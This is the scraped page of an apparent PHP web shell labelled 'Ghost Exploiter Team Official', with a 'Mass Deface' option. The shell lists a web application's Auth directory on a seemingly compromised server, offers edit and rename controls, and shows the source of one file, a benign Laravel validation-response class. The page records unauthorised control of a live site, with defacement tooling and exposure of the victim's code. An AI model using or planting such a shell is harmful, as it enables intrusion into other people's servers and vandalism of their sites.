Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Domain
/
Auth
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Requests
--
ren
AuthService-20260128031
...
0.683KB
edt
ren
AuthService.php
0.683KB
edt
ren
FailedValidationExcepti
...
0.988KB
edt
ren
OpenApiValidationErrorR
...
0.709KB
edt
ren
PaymentService.php
0KB
edt
ren
ResourceResponse.php
1.179KB
edt
ren
ResponseService.php
0.823KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
index.html
0.435KB
edt
ren
users.php
0.828KB
edt
ren
<?php declare(strict_types=1); namespace App\Attributes; use AllowDynamicProperties; use App\Responses\Shared\Dto; use App\Services\Shared\ResponseService; use Attribute; use Knuckles\Scribe\Attributes\Response as ResponseAttribute; #[AllowDynamicProperties] #[Attribute(Attribute::IS_REPEATABLE | Attribute::TARGET_FUNCTION | Attribute::TARGET_METHOD | Attribute::TARGET_CLASS)] class OpenApiValidationErrorResponse extends ResponseAttribute { public function __construct() { } public function toArray(): array { return [ 'status' => 422, 'content' => ResponseService::array(Dto::validationError()), 'description' => 'Validation Error', ]; } }